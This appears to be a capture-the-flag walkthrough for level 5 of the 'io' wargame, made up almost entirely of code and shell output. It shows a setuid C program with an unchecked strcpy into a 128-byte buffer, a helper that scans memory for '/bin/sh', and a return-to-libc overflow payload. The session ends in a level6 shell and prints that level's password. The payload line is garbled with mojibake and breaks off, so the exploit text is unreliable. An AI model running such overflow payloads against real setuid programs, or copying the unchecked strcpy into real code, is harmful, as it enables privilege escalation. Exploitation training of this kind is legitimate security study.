level5

summary:simple RTL

level5@io:/levels$ cat level05.c

#include <stdio.h>

#include <string.h>

int main(int argc, char **argv) {

        char buf[128];

        if(argc < 2) return 1;

        strcpy(buf, argv[1]);

        printf("%s\n", buf);

        return 0;

}

level5@io:/tmp/sanguine2$ cat whereisshell.c

#include <stdio.h>

main()

{

        long shell = 0xb7eaaf10;

        while(memcmp((void*)shell,"/bin/sh",8))

                shell++;

        printf("%x\n",shell);

}

level5@io:/tmp/sanguine2$ ./whereisshell

b7faaad4

level5@io:/tmp/sanguine2$ /levels/level05 `perl -e 'print "a"x140,"\x10\xaf\xeaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¯ê·aaaaÔªú·

sh-4.2$ id

uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1006(level6),1005(le

sh-4.2$ cat /home/level6/.pass

9BT8fmYDTPimXXhY3m